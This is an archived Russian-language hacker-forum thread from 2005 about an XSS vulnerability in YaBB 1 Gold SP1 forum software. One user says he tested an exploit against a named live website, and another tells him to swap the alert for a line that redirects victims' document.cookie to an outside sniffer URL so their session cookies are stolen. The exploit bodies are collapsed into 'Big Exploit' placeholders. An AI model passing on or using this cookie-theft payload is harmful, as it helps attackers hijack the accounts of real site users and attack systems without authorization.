PDA

Просмотр полной версии : Уязвимость, YaBB 1 Gold - SP1, XSS атака.


Romaxa55
13.12.2005, 00:18
Big Exploit
или

Big Exploit
Что не так в этом коде, проверял на http://www.mgapi.ru/cgi-bin/yabb/
Big Exploit

FQziT
13.12.2005, 00:39
Так. Ну это алерт, а тебе нужно, чтобы приходили куки на сниффер, да? Ну тогда подумай головой=)) Нужно вместо alert(document.cookie) вставить свой код. К примеру, document.location.href='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie
Но это только пример=)) Попробуй, может получится-)
Не забываем про РЕПУТАЦИЮ!

Big Exploit
Это уже готовое.

И не надо изподтишка сообщение редактировать, ок? Я ответил на вопрос, уже новым сообщением пиши, а не редактируй старое!

Romaxa55
13.12.2005, 00:57
Да спасиб, но проблемма в том что, нет знаний в этой области, вот токо начал изучать.. ща попробую что нить.. Спасиб

FQziT
13.12.2005, 01:04
Romaxa55 Всегда пожалуйста=)

Romaxa55
13.12.2005, 01:25
Думаю тема закрыта, еще раз спасибо FQziT